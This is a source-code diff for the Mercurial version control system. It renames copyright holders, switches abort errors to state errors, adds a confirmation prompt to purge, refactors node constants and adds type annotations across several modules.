+ dnext = dir + encoding.strtolocal(chr(ord(b'/') + 1))
+ # Use bisect to find the first element >= d_next
+ last = bisect.bisect_left(candidates, dnext, lo=first)
+ dlen = len(d)
+ candidates = {c[dlen:] for c in candidates[first:last]}
# self._dirs includes all of the directories, recursively, so if
# we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
# 'foo/bar' in it. Thus we can safely ignore a candidate that has a
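
The bisect change above replaces a full scan of the candidate set with two binary searches over a sorted, memoized list: all entries starting with d = dir + '/' form one contiguous run, bounded below by d itself and above by dir plus the character that sorts right after '/'. A standalone sketch of the same trick on plain strings:

    import bisect

    def children_of(sorted_candidates, dir):
        d = dir + '/'
        first = bisect.bisect_left(sorted_candidates, d)
        # smallest string greater than anything that starts with d
        dnext = dir + chr(ord('/') + 1)  # '0' sorts right after '/'
        last = bisect.bisect_left(sorted_candidates, dnext, lo=first)
        return {c[len(d):] for c in sorted_candidates[first:last]}

    # children_of(['a/b', 'a/c/d', 'b'], 'a') -> {'b', 'c/d'}
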
--- a/mercurial/mdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mdiff.py - diff and patch routines for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/merge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/merge.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# merge.py - directory-level update/merge handling for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -234,7 +234,7 @@
else:
warn(_(b"%s: untracked file differs\n") % f)
if abortconflicts:
- raise error.Abort(
+ raise error.StateError(
_(
b"untracked files in working directory "
b"differ from files in requested revision"
@@ -342,7 +342,7 @@
for f in pmmf:
fold = util.normcase(f)
if fold in foldmap:
- raise error.Abort(
+ raise error.StateError(
_(b"case-folding collision between %s and %s")
% (f, foldmap[fold])
)
@@ -353,7 +353,7 @@
for fold, f in sorted(foldmap.items()):
if fold.startswith(foldprefix) and not f.startswith(unfoldprefix):
# the folded prefix matches but actual casing is different
- raise error.Abort(
+ raise error.StateError(
_(b"case-folding collision between %s and directory of %s")
% (lastfull, f)
)
@@ -505,7 +505,9 @@
if invalidconflicts:
for p in invalidconflicts:
repo.ui.warn(_(b"%s: is both a file and a directory\n") % p)
- raise error.Abort(_(b"destination manifest contains path conflicts"))
+ raise error.StateError(
+ _(b"destination manifest contains path conflicts")
+ )
def _filternarrowactions(narrowmatch, branchmerge, mresult):
@@ -1696,6 +1698,7 @@
tocomplete = []
for f, args, msg in mergeactions:
repo.ui.debug(b" %s: %s -> m (premerge)\n" % (f, msg))
+ ms.addcommitinfo(f, {b'merged': b'yes'})
progress.increment(item=f)
if f == b'.hgsubstate': # subrepo states need updating
subrepoutil.submerge(
@@ -1711,6 +1714,7 @@
# merge
for f, args, msg in tocomplete:
repo.ui.debug(b" %s: %s -> m (merge)\n" % (f, msg))
+ ms.addcommitinfo(f, {b'merged': b'yes'})
progress.increment(item=f, total=numupdates)
ms.resolve(f, wctx)
@@ -1919,10 +1923,10 @@
### check phase
if not overwrite:
if len(pl) > 1:
- raise error.Abort(_(b"outstanding uncommitted merge"))
+ raise error.StateError(_(b"outstanding uncommitted merge"))
ms = wc.mergestate()
- if list(ms.unresolved()):
- raise error.Abort(
+ if ms.unresolvedcount():
+ raise error.StateError(
_(b"outstanding merge conflicts"),
hint=_(b"use 'hg resolve' to resolve"),
)
@@ -2008,7 +2012,7 @@
if mresult.hasconflicts():
msg = _(b"conflicting changes")
hint = _(b"commit or update --clean to discard changes")
- raise error.Abort(msg, hint=hint)
+ raise error.StateError(msg, hint=hint)
# Prompt and create actions. Most of this is in the resolve phase
# already, but we can't handle .hgsubstate in filemerge or
@@ -2325,6 +2329,7 @@
removefiles=True,
abortonerror=False,
noop=False,
+ confirm=False,
):
"""Purge the working directory of untracked files.
@@ -2345,6 +2350,8 @@
``noop`` controls whether to actually remove files. If not defined, actions
will be taken.
+ ``confirm`` ask confirmation before actually removing anything.
+
Returns an iterable of relative paths in the working directory that were
or would be removed.
"""
@@ -2372,6 +2379,35 @@
status = repo.status(match=matcher, ignored=ignored, unknown=unknown)
+ if confirm:
+ nb_ignored = len(status.ignored)
+        nb_unknown = len(status.unknown)
+        if nb_unknown and nb_ignored:
+            msg = _(b"permanently delete %d unknown and %d ignored files?")
+            msg %= (nb_unknown, nb_ignored)
+        elif nb_unknown:
+            msg = _(b"permanently delete %d unknown files?")
+            msg %= nb_unknown
+ elif nb_ignored:
+ msg = _(b"permanently delete %d ignored files?")
+ msg %= nb_ignored
+ elif removeemptydirs:
+ dir_count = 0
+ for f in directories:
+ if matcher(f) and not repo.wvfs.listdir(f):
+ dir_count += 1
+ if dir_count:
+ msg = _(
+ b"permanently delete at least %d empty directories?"
+ )
+ msg %= dir_count
+ else:
+                # XXX we might be missing directories here
+ return res
+ msg += b" (yN)$$ &Yes $$ &No"
+ if repo.ui.promptchoice(msg, default=1) == 1:
+ raise error.CanceledError(_(b'removal cancelled'))
+
if removefiles:
for f in sorted(status.unknown + status.ignored):
if not noop:
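
The confirmation prompt built above relies on Mercurial's embedded-choice syntax: everything after '$$' enumerates the choices, '&' marks each response key, and ui.promptchoice() returns the 0-based index of the answer, so default=1 preselects 'No'. Reusing the names from the hunk above:

    msg = b"permanently delete 3 unknown files? (yN)$$ &Yes $$ &No"
    if repo.ui.promptchoice(msg, default=1) == 1:  # 1 is the '&No' branch
        raise error.CanceledError(_(b'removal cancelled'))
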
--- a/mercurial/mergestate.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mergestate.py Tue Apr 20 11:01:06 2021 -0400
@@ -10,7 +10,7 @@
bin,
hex,
nullhex,
- nullid,
+ nullrev,
)
from . import (
error,
@@ -341,7 +341,7 @@
flo = fco.flags()
fla = fca.flags()
if b'x' in flags + flo + fla and b'l' not in flags + flo + fla:
- if fca.node() == nullid and flags != flo:
+ if fca.rev() == nullrev and flags != flo:
if preresolve:
self._repo.ui.warn(
_(
@@ -382,7 +382,6 @@
if merge_ret is None:
# If return value of merge is None, then there are no real conflict
del self._state[dfile]
- self._stateextras.pop(dfile, None)
self._dirty = True
elif not merge_ret:
self.mark(dfile, MERGE_RECORD_RESOLVED)
--- a/mercurial/mergeutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mergeutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mergeutil.py - help for merge processing in mercurial
#
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -13,7 +13,7 @@
def checkunresolved(ms):
- if list(ms.unresolved()):
+ if ms.unresolvedcount():
raise error.StateError(
_(b"unresolved merge conflicts (see 'hg help resolve')")
)
--- a/mercurial/metadata.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/metadata.py Tue Apr 20 11:01:06 2021 -0400
@@ -18,6 +18,7 @@
from . import (
error,
pycompat,
+ requirements as requirementsmod,
util,
)
@@ -321,12 +322,12 @@
│ (Some, None) │ OR │🄻 Deleted │ ø │ ø │
│ │🄷 Deleted[1] │ │ │ │
├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤
- │ │🄸 No Changes │ │ │ │
- │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │
+ │ │🄸 No Changes │ │ │ 🄽 Touched │
+ │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │
│ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) │
├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤
- │ │ │ │ │ │
- │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │
+ │ │ │ │ 🄾 Touched │ 🄿 Merged │
+ │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │
│ │ [3] │ │ (copied?) │ (copied?) │
└──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘
@@ -414,6 +415,7 @@
nice bonus. However, we do not do any of this yet.
"""
+ repo = ctx.repo()
md = ChangingFiles()
m = ctx.manifest()
@@ -453,8 +455,23 @@
# case 🄻 — both deleted the file.
md.mark_removed(filename)
elif d1[1][0] is not None and d2[1][0] is not None:
- # case 🄽 🄾 🄿
- md.mark_merged(filename)
+ if d1[0][0] is None or d2[0][0] is None:
+ if any(_find(ma, filename) is not None for ma in mas):
+ # case 🅀 or 🅁
+ md.mark_salvaged(filename)
+ else:
+ # case 🄽 🄾 : touched
+ md.mark_touched(filename)
+ else:
+ fctx = repo.filectx(filename, fileid=d1[1][0])
+ if fctx.p2().rev() == nullrev:
+ # case 🅂
+ # let's assume we can trust the file history. If the
+ # filenode is not a merge, the file was not merged.
+ md.mark_touched(filename)
+ else:
+ # case 🄿
+ md.mark_merged(filename)
copy_candidates.append(filename)
else:
# Impossible case, the post-merge file status cannot be None on
@@ -804,6 +821,21 @@
return encode_files_sidedata(files), files.has_copies_info
+def copies_sidedata_computer(repo, revlog, rev, existing_sidedata):
+ return _getsidedata(repo, rev)[0]
+
+
+def set_sidedata_spec_for_repo(repo):
+ if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements:
+ repo.register_wanted_sidedata(sidedatamod.SD_FILES)
+ repo.register_sidedata_computer(
+ b"changelog",
+ sidedatamod.SD_FILES,
+ (sidedatamod.SD_FILES,),
+ copies_sidedata_computer,
+ )
+
+
def getsidedataadder(srcrepo, destrepo):
use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade')
if pycompat.iswindows or not use_w:
@@ -882,14 +914,14 @@
data = {}, False
if util.safehasattr(revlog, b'filteredrevs'): # this is a changelog
# Is the data previously shelved ?
- sidedata = staging.pop(rev, None)
- if sidedata is None:
+ data = staging.pop(rev, None)
+ if data is None:
# look at the queued result until we find the one we are looking
# for (shelve the other ones)
r, data = sidedataq.get()
while r != rev:
staging[r] = data
- r, sidedata = sidedataq.get()
+ r, data = sidedataq.get()
tokens.release()
sidedata, has_copies_info = data
new_flag = 0
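
`set_sidedata_spec_for_repo` registers the copies computer only when the
sidedata requirement is present, keying it on the changelog and the
`SD_FILES` category. A reduced sketch of that registration pattern — the repo
class below is a hypothetical stand-in, not the localrepo API:

    # Hypothetical stand-in repo; only the registration shape mirrors
    # set_sidedata_spec_for_repo() above.
    SD_FILES = 1
    COPIES_REQUIREMENT = b'exp-copies-sidedata-changeset'

    class FakeRepo(object):
        def __init__(self, requirements):
            self.requirements = requirements
            self.wanted = set()
            self.computers = {}

        def register_wanted_sidedata(self, category):
            self.wanted.add(category)

        def register_sidedata_computer(self, kind, category, deps, fn):
            self.computers[(kind, category)] = (deps, fn)

    def set_spec(repo):
        # register only when the repository advertises the requirement
        if COPIES_REQUIREMENT in repo.requirements:
            repo.register_wanted_sidedata(SD_FILES)
            repo.register_sidedata_computer(
                b"changelog", SD_FILES, (SD_FILES,), lambda *a: {}
            )

    repo = FakeRepo({COPIES_REQUIREMENT})
    set_spec(repo)
    assert (b"changelog", SD_FILES) in repo.computers
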
--- a/mercurial/minirst.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/minirst.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# minirst.py - minimal reStructuredText parser
#
-# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -158,7 +158,7 @@
_optionre = re.compile(
br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$'
)
-_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)')
+_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)')
_definitionre = re.compile(br'[^ ]')
_tablere = re.compile(br'(=+\s+)*=+')
@@ -229,7 +229,7 @@
m = _fieldre.match(blocks[j][b'lines'][0])
key, rest = m.groups()
blocks[j][b'lines'][0] = rest
- blocks[j][b'key'] = key
+ blocks[j][b'key'] = key.replace(br'\:', b':')
j += 1
i = j + 1
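
The widened `_fieldre` lets a field name carry literal colons escaped as
`\:`; the escape is stripped when the key is stored. A quick demonstration
with the new pattern:

    import re

    # the updated field-list pattern from minirst.py: the key may now
    # contain backslash-escaped colons
    fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)')

    m = fieldre.match(br':foo\:bar: value')
    key, rest = m.groups()
    # the stored key has the escape removed, as in the hunk above
    assert key.replace(br'\:', b':') == b'foo:bar'
    assert rest == b'value'
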
--- a/mercurial/mpatch.c Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/mpatch.c Tue Apr 20 11:01:06 2021 -0400
@@ -14,7 +14,7 @@
allocation of intermediate Python objects. Working memory is about 2x
the total number of hunks.
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+ Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
--- a/mercurial/narrowspec.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/narrowspec.py Tue Apr 20 11:01:06 2021 -0400
@@ -329,7 +329,6 @@
trackeddirty = status.modified + status.added
clean = status.clean
if assumeclean:
- assert not trackeddirty
clean.extend(lookup)
else:
trackeddirty.extend(lookup)
--- a/mercurial/node.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/node.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# node.py - basic nodeid manipulation for mercurial
#
-# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
+# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -21,29 +21,48 @@
raise TypeError(e)
-nullrev = -1
-# In hex, this is '0000000000000000000000000000000000000000'
-nullid = b"\0" * 20
-nullhex = hex(nullid)
+def short(node):
+ return hex(node[:6])
+
-# Phony node value to stand-in for new files in some uses of
-# manifests.
-# In hex, this is '2121212121212121212121212121212121212121'
-newnodeid = b'!!!!!!!!!!!!!!!!!!!!'
-# In hex, this is '3030303030303030303030303030306164646564'
-addednodeid = b'000000000000000added'
-# In hex, this is '3030303030303030303030306d6f646966696564'
-modifiednodeid = b'000000000000modified'
+nullrev = -1
-wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid}
-
-# pseudo identifiers for working directory
-# (they are experimental, so don't add too many dependencies on them)
+# pseudo identifier for working directory
+# (experimental, so don't add too many dependencies on it)
wdirrev = 0x7FFFFFFF
-# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff'
-wdirid = b"\xff" * 20
-wdirhex = hex(wdirid)
-def short(node):
- return hex(node[:6])
+class sha1nodeconstants(object):
+ nodelen = 20
+
+ # In hex, this is '0000000000000000000000000000000000000000'
+ nullid = b"\0" * nodelen
+ nullhex = hex(nullid)
+
+ # Phony node value to stand-in for new files in some uses of
+ # manifests.
+ # In hex, this is '2121212121212121212121212121212121212121'
+ newnodeid = b'!!!!!!!!!!!!!!!!!!!!'
+ # In hex, this is '3030303030303030303030303030306164646564'
+ addednodeid = b'000000000000000added'
+ # In hex, this is '3030303030303030303030306d6f646966696564'
+ modifiednodeid = b'000000000000modified'
+
+ wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid}
+
+ # pseudo identifier for working directory
+ # (experimental, so don't add too many dependencies on it)
+ # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff'
+ wdirid = b"\xff" * nodelen
+ wdirhex = hex(wdirid)
+
+
+# legacy starting point for porting modules
+nullid = sha1nodeconstants.nullid
+nullhex = sha1nodeconstants.nullhex
+newnodeid = sha1nodeconstants.newnodeid
+addednodeid = sha1nodeconstants.addednodeid
+modifiednodeid = sha1nodeconstants.modifiednodeid
+wdirfilenodeids = sha1nodeconstants.wdirfilenodeids
+wdirid = sha1nodeconstants.wdirid
+wdirhex = sha1nodeconstants.wdirhex
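
Collecting the constants in `sha1nodeconstants` keeps the legacy
module-level names working while giving future hash flavors a single object
to swap out. A self-contained sketch of how the class-plus-aliases layout
behaves:

    import binascii

    def hex(node):
        # stand-in for mercurial.node.hex
        return binascii.hexlify(node)

    class sha1nodeconstants(object):
        nodelen = 20
        nullid = b"\0" * nodelen
        nullhex = hex(nullid)
        wdirid = b"\xff" * nodelen
        wdirhex = hex(wdirid)

    # a legacy module-level alias keeps old call sites working
    nullid = sha1nodeconstants.nullid

    assert sha1nodeconstants.nullhex == b"0" * 40
    assert sha1nodeconstants.wdirhex == b"f" * 40
    assert nullid == b"\x00" * 20
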
--- a/mercurial/obsolete.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/obsolete.py Tue Apr 20 11:01:06 2021 -0400
@@ -560,10 +560,11 @@
# parents: (tuple of nodeid) or None, parents of predecessors
# None is used when no data has been recorded
- def __init__(self, svfs, defaultformat=_fm1version, readonly=False):
+ def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False):
# caches for various obsolescence related data
self.caches = {}
self.svfs = svfs
+ self.repo = repo
self._defaultformat = defaultformat
self._readonly = readonly
@@ -806,7 +807,7 @@
if defaultformat is not None:
kwargs['defaultformat'] = defaultformat
readonly = not isenabled(repo, createmarkersopt)
- store = obsstore(repo.svfs, readonly=readonly, **kwargs)
+ store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs)
if store and readonly:
ui.warn(
_(b'obsolete feature not enabled but %i markers found!\n')
--- a/mercurial/parser.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/parser.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# parser.py - simple top-down operator precedence parser for mercurial
#
-# Copyright 2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pathutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pathutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,11 +15,21 @@
util,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Callable,
+ Iterator,
+ Optional,
+ )
+
+
rustdirs = policy.importrust('dirstate', 'Dirs')
parsers = policy.importmod('parsers')
def _lowerclean(s):
+ # type: (bytes) -> bytes
return encoding.hfsignoreclean(s.lower())
@@ -59,6 +69,7 @@
self.normcase = lambda x: x
def __call__(self, path, mode=None):
+ # type: (bytes, Optional[Any]) -> None
"""Check the relative path.
path may contain a pattern (e.g. foodir/**.txt)"""
@@ -119,6 +130,7 @@
self.audited.add(normpath)
def _checkfs(self, prefix, path):
+ # type: (bytes, bytes) -> None
"""raise exception if a file system backed check fails"""
curpath = os.path.join(self.root, prefix)
try:
@@ -143,6 +155,7 @@
raise error.Abort(msg % (path, pycompat.bytestr(prefix)))
def check(self, path):
+ # type: (bytes) -> bool
try:
self(path)
return True
@@ -164,6 +177,7 @@
def canonpath(root, cwd, myname, auditor=None):
+ # type: (bytes, bytes, bytes, Optional[pathauditor]) -> bytes
"""return the canonical path of myname, given cwd and root
>>> def check(root, cwd, myname):
@@ -266,6 +280,7 @@
def normasprefix(path):
+ # type: (bytes) -> bytes
"""normalize the specified path as path prefix
Returned value can be used safely for "p.startswith(prefix)",
@@ -289,6 +304,7 @@
def finddirs(path):
+ # type: (bytes) -> Iterator[bytes]
pos = path.rfind(b'/')
while pos != -1:
yield path[:pos]
@@ -318,6 +334,7 @@
addpath(f)
def addpath(self, path):
+ # type: (bytes) -> None
dirs = self._dirs
for base in finddirs(path):
if base.endswith(b'/'):
@@ -330,6 +347,7 @@
dirs[base] = 1
def delpath(self, path):
+ # type: (bytes) -> None
dirs = self._dirs
for base in finddirs(path):
if dirs[base] > 1:
@@ -341,6 +359,7 @@
return iter(self._dirs)
def __contains__(self, d):
+ # type: (bytes) -> bool
return d in self._dirs
@@ -355,4 +374,4 @@
# rather not let our internals know that we're thinking in posix terms
# - instead we'll let them be oblivious.
join = posixpath.join
-dirname = posixpath.dirname
+dirname = posixpath.dirname # type: Callable[[bytes], bytes]
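
These are Python 2-compatible comment-style annotations, read by type
checkers exactly like inline annotations. For example, `finddirs` as
annotated above yields each ancestor directory of a slash-separated path; a
runnable version consistent with the lines shown (the loop-advance line is
assumed from the function's behavior, and the type comment is illustrative):

    def finddirs(path):
        # type: (bytes) -> Iterator[bytes]
        # yields ancestor directories, deepest first
        pos = path.rfind(b'/')
        while pos != -1:
            yield path[:pos]
            pos = path.rfind(b'/', 0, pos)

    assert list(finddirs(b'a/b/c.txt')) == [b'a/b', b'a']
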
--- a/mercurial/phases.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/phases.py Tue Apr 20 11:01:06 2021 -0400
@@ -127,10 +127,32 @@
util,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Any,
+ Callable,
+ Dict,
+ Iterable,
+ List,
+ Optional,
+ Set,
+ Tuple,
+ )
+ from . import (
+ localrepo,
+ ui as uimod,
+ )
+
+ Phaseroots = Dict[int, Set[bytes]]
+ Phasedefaults = List[
+ Callable[[localrepo.localrepository, Phaseroots], Phaseroots]
+ ]
+
+
_fphasesentry = struct.Struct(b'>i20s')
# record phase index
-public, draft, secret = range(3)
+public, draft, secret = range(3) # type: int
archived = 32 # non-continuous for compatibility
internal = 96 # non-continuous for compatibility
allphases = (public, draft, secret, archived, internal)
@@ -154,11 +176,13 @@
def supportinternal(repo):
+ # type: (localrepo.localrepository) -> bool
"""True if the internal phase can be used on a repository"""
return requirements.INTERNAL_PHASE_REQUIREMENT in repo.requirements
def _readroots(repo, phasedefaults=None):
+ # type: (localrepo.localrepository, Optional[Phasedefaults]) -> Tuple[Phaseroots, bool]
"""Read phase roots from disk
phasedefaults is a list of fn(repo, roots) callable, which are
@@ -191,6 +215,7 @@
def binaryencode(phasemapping):
+ # type: (Dict[int, List[bytes]]) -> bytes
"""encode a 'phase -> nodes' mapping into a binary stream
The revision lists are encoded as (phase, root) pairs.
@@ -203,6 +228,7 @@
def binarydecode(stream):
+ # type: (...) -> Dict[int, List[bytes]]
"""decode a binary stream into a 'phase -> nodes' mapping
The (phase, root) pairs are turned back into a dictionary with
@@ -321,6 +347,7 @@
class phasecache(object):
def __init__(self, repo, phasedefaults, _load=True):
+ # type: (localrepo.localrepository, Optional[Phasedefaults], bool) -> None
if _load:
# Cheap trick to allow shallow-copy without copy module
self.phaseroots, self.dirty = _readroots(repo, phasedefaults)
@@ -330,6 +357,7 @@
self.opener = repo.svfs
def hasnonpublicphases(self, repo):
+ # type: (localrepo.localrepository) -> bool
"""detect if there are revisions with non-public phase"""
repo = repo.unfiltered()
cl = repo.changelog
@@ -343,6 +371,7 @@
)
def nonpublicphaseroots(self, repo):
+ # type: (localrepo.localrepository) -> Set[bytes]
"""returns the roots of all non-public phases
The roots are not minimized, so if the secret revisions are
@@ -362,6 +391,8 @@
)
def getrevset(self, repo, phases, subset=None):
+ # type: (localrepo.localrepository, Iterable[int], Optional[Any]) -> Any
+ # TODO: finish typing this
"""return a smartset for the given phases"""
self.loadphaserevs(repo) # ensure phase's sets are loaded
phases = set(phases)
@@ -457,6 +488,7 @@
self._loadedrevslen = len(cl)
def loadphaserevs(self, repo):
+ # type: (localrepo.localrepository) -> None
"""ensure phase information is loaded in the object"""
if self._phasesets is None:
try:
@@ -470,6 +502,7 @@
self._phasesets = None
def phase(self, repo, rev):
+ # type: (localrepo.localrepository, int) -> int
# We need a repo argument here to be able to build _phasesets
# if necessary. The repository instance is not stored in
# phasecache to avoid reference cycles. The changelog instance
@@ -652,6 +685,7 @@
return False
def filterunknown(self, repo):
+ # type: (localrepo.localrepository) -> None
"""remove unknown nodes from the phase boundary
Nothing is lost as unknown nodes only hold data for their descendants.
@@ -729,6 +763,7 @@
def listphases(repo):
+ # type: (localrepo.localrepository) -> Dict[bytes, bytes]
"""List phases root for serialization over pushkey"""
# Use ordered dictionary so behavior is deterministic.
keys = util.sortdict()
@@ -760,6 +795,7 @@
def pushphase(repo, nhex, oldphasestr, newphasestr):
+ # type: (localrepo.localrepository, bytes, bytes, bytes) -> bool
"""List phases root for serialization over pushkey"""
repo = repo.unfiltered()
with repo.lock():
@@ -909,6 +945,7 @@
def newcommitphase(ui):
+ # type: (uimod.ui) -> int
"""helper to get the target phase of new commit
Handle all possible values for the phases.new-commit options.
@@ -924,11 +961,13 @@
def hassecret(repo):
+ # type: (localrepo.localrepository) -> bool
"""utility function that check if a repo have any secret changeset."""
return bool(repo._phasecache.phaseroots[secret])
def preparehookargs(node, old, new):
+ # type: (bytes, Optional[int], Optional[int]) -> Dict[bytes, bytes]
if old is None:
old = b''
else:
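
The `_fphasesentry` struct fixes each on-disk phase record as a big-endian
4-byte phase followed by a 20-byte root node. A minimal sketch of encoding
and decoding such records, independent of the real binaryencode and
binarydecode helpers:

    import struct

    # same layout as phases._fphasesentry: 4-byte phase, 20-byte node
    entry = struct.Struct(b'>i20s')

    def encode(mapping):
        # mapping: phase int -> list of 20-byte root nodes
        out = []
        for phase, roots in sorted(mapping.items()):
            for root in roots:
                out.append(entry.pack(phase, root))
        return b''.join(out)

    def decode(data):
        mapping = {}
        for off in range(0, len(data), entry.size):
            phase, root = entry.unpack_from(data, off)
            mapping.setdefault(phase, []).append(root)
        return mapping

    roots = {1: [b'\x11' * 20], 2: [b'\x22' * 20]}
    assert decode(encode(roots)) == roots
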
--- a/mercurial/posix.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/posix.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# posix.py - Posix utility function implementations for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/profiling.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/profiling.py Tue Apr 20 11:01:06 2021 -0400
@@ -228,7 +228,7 @@
if self._output == b'blackbox':
self._fp = util.stringio()
elif self._output:
- path = self._ui.expandpath(self._output)
+ path = util.expandpath(self._output)
self._fp = open(path, b'wb')
elif pycompat.iswindows:
# parse escape sequence by win32print()
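
`ui.expandpath` resolves configured path aliases, which is the wrong
operation for a plain output filename; `util.expandpath` only performs user
and environment expansion. Assuming it mirrors the standard library (an
assumption, since the helper itself is not shown in this patch):

    import os.path

    def expandpath(path):
        # assumed equivalent of mercurial's util.expandpath: expand
        # ~user and $VARS, but do no path-alias lookup
        return os.path.expanduser(os.path.expandvars(path))

    print(expandpath('~/profile-$USER.out'))
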
--- a/mercurial/pure/bdiff.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/bdiff.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# bdiff.py - Python implementation of bdiff.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/charencode.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/charencode.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# charencode.py - miscellaneous character encoding
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/mpatch.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/mpatch.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# mpatch.py - Python implementation of mpatch.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/osutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/osutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# osutil.py - pure Python version of osutil.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/pure/parsers.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/pure/parsers.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# parsers.py - Python implementation of parsers.c
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -17,6 +17,7 @@
)
from ..revlogutils import nodemap as nodemaputil
+from ..revlogutils import constants as revlog_constants
stringio = pycompat.bytesio
@@ -33,13 +34,6 @@
return x
-indexformatng = b">Qiiiiii20s12x"
-indexfirst = struct.calcsize(b'Q')
-sizeint = struct.calcsize(b'i')
-indexsize = struct.calcsize(indexformatng)
